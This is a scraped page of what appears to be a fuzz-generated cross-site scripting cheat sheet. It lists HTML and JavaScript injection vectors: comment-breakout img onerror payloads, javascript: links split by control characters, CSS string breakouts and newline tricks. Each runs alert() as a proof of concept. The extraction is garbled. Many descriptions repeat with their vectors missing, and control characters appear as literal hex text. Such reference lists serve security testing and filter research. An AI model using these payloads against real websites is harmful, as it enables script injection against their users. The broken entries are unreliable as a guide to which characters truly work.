Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 174 vectors with results
This shows what characters can separate classes in HTML.
This shows what characters can separate classes in HTML.
This shows what characters can separate classes in HTML.
<!--- ><xmp>--><img src/onerror=alert(45)>-->This vector shows what characters are allowed in-between hyphens of a HTML comment.
<div style="font-family:'x
;color:red;';">test</div><div style="font-family:'x0x0C;color:red;';">test</div>This vector shows what characters allow you to break out of CSS strings.
<div style="font-family:'x0x0D;color:red;';">test</div>This vector shows what characters allow you to break out of CSS strings.
<div style="font-family:'x';color:red;';">test</div>const c = String.fromCodePoint(i)0x0D
const c_lower = c.toLowerCase()0x0D
if (c_lower.length != c.length){0x0D
alert(i)0x0D
}Useful for code that expects data of a certain length, but lowercases it in between checking and using.
<a id="0" href="j0x09avas0x09crip0x09t:window">craft-me</a><a id="0" href="j
avas
crip
t:window">craft-me</a><a id="0" href="j0x0Davas0x0Dcrip0x0Dt:window">craft-me</a>This vector shows what characters can be used to break out of a single line comment and execute Javascript
This vector shows what characters can be used to break out of a single line comment and execute Javascript
This vector shows what characters can be used to break out of a single line comment and execute Javascript
This vector shows what characters can be used to break out of a single line comment and execute Javascript
<div style=0x09color:red⟦09⟧></div>This vector shows which characters act as quotes or whitespace in HTML attributes
This vector shows which characters act as quotes or whitespace in HTML attributes
<div style=0x0Ccolor:red⟦0C⟧></div>This vector shows which characters act as quotes or whitespace in HTML attributes
<div style=0x0Dcolor:red⟦0D⟧></div>This vector shows which characters act as quotes or whitespace in HTML attributes
This vector shows which characters act as quotes or whitespace in HTML attributes
<!----!><img/src/onerror=alert(1)>This vector checks for what characters are allowed before the greater than character.
<!-----><img/src/onerror=alert(1)>This vector checks for what characters are allowed before the greater than character.
<!---->><img/src/onerror=alert(1)>This vector checks for what characters are allowed before the greater than character.
""
alert(10)This vector shows what characters act as new line or space after the JavaScript string.
""0x0Dalert(13)This vector shows what characters act as new line or space after the JavaScript string.
""%alert(37)This vector shows what characters act as new line or space after the JavaScript string.
""&alert(38)This vector shows what characters act as new line or space after the JavaScript string.
""*alert(42)This vector shows what characters act as new line or space after the JavaScript string.
alert(10)
sdfasdfasfasfdThis vector shows which characters cause a new line or single line comment.
alert(13)0x0D0x0DsdfasdfasfasfdThis vector shows which characters cause a new line or single line comment.
alert(38)&&sdfasdfasfasfdThis vector shows which characters cause a new line or single line comment.
alert(42)**sdfasdfasfasfdThis vector shows which characters cause a new line or single line comment.
alert(47)//sdfasdfasfasfdThis vector shows which characters cause a new line or single line comment.
This vector shows what characters are allowed before parentheses in a function call in JavaScript.
This vector shows what characters are allowed before parentheses in a function call in JavaScript.
This vector shows what characters are allowed before parentheses in a function call in JavaScript.
This vector shows what characters are allowed before parentheses in a function call in JavaScript.
This vector shows what characters are allowed before parentheses in a function call in JavaScript.
This vector shows what characters are after before parentheses in a function call in JavaScript.
This vector shows what characters are after before parentheses in a function call in JavaScript.
This vector shows what characters are after before parentheses in a function call in JavaScript.
This vector shows what characters are after before parentheses in a function call in JavaScript.
This vector shows what characters are after before parentheses in a function call in JavaScript.
This is just to get a full list of characters that are allowed between JavaScript functions
This is just to get a full list of characters that are allowed between JavaScript functions
This is just to get a full list of characters that are allowed between JavaScript functions
This is just to get a full list of characters that are allowed between JavaScript functions
This is just to get a full list of characters that are allowed between JavaScript functions
Characters that can be before the closing angle bracket and still form a valid HTML element
Characters that can be before the closing angle bracket and still form a valid HTML element
Characters that can be before the closing angle bracket and still form a valid HTML element
Characters that can be before the closing angle bracket and still form a valid HTML element
Characters that can be before the closing angle bracket and still form a valid HTML element
Page 9 of 9